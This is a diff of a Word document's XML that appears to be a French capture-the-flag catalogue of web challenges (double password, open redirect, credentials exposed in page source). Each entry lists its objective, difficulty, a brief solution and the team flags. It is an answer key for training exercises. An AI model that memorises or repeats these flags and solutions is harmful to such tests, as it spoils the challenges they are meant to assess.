-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Double </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Difficulté de la faille :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Description de la faille : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Trouver le bon mot de passe</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Capture d’écran :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Solution : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Flag de la faille A : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>marvelspiderman551</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Flag de la faille B : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Hosttorvpn12</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="705"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Nom de la faille</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> : </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Open_Redirect</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> / http-030</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:t>Catégorie </w:t>
-      </w:r>
-      <w:r>
-        <w:t>: http</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:t>Objectif </w:t>
-      </w:r>
-      <w:r>
-        <w:t>: Réussir à faire une redirection vers un autre domaine pour débloquer le flag</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:t>Description :</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Le challenger doit retrouver le doit trouver le flag en faisant une redirection vers un autre domaine. La page présente 3 boutons vers des sites connus, Facebook, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Twitter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, et Slack.fr. Les boutons contiennent un lien de redirection qui est associé à un hash de l’adresse</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Titre2"/>
-        <w:ind w:left="1065"/>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Capture d’écran :</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="541EBF5D" wp14:editId="3AA047AD">
-            <wp:extent cx="5760720" cy="953587"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="31" name="Image 31"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -13524,6 +13032,652 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="1309422"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31893457" wp14:editId="77A9CC3D">
+            <wp:extent cx="5760720" cy="3072057"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="30" name="Image 30"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId31"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="3072057"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t>Solution :</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Inspecter le code de la page formulaire, elle contient les identifiants de la boîte mail, ensuite les flags sont enregistré dans « à conserver » et dans « brouillon ».</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t>Flag team A :</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>cetaitpassiduraufinal</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t>Flag team B :</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>cesttropfacilequandmeme</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1065"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1065"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Nom de la faille :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>http-028</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Catégorie de la faille </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>http</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Objectif de la faille : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Double </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Difficulté de la faille :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Description de la faille : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Trouver le bon mot de passe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Capture d’écran :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Solution : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Flag de la faille A : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>marvelspiderman551</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
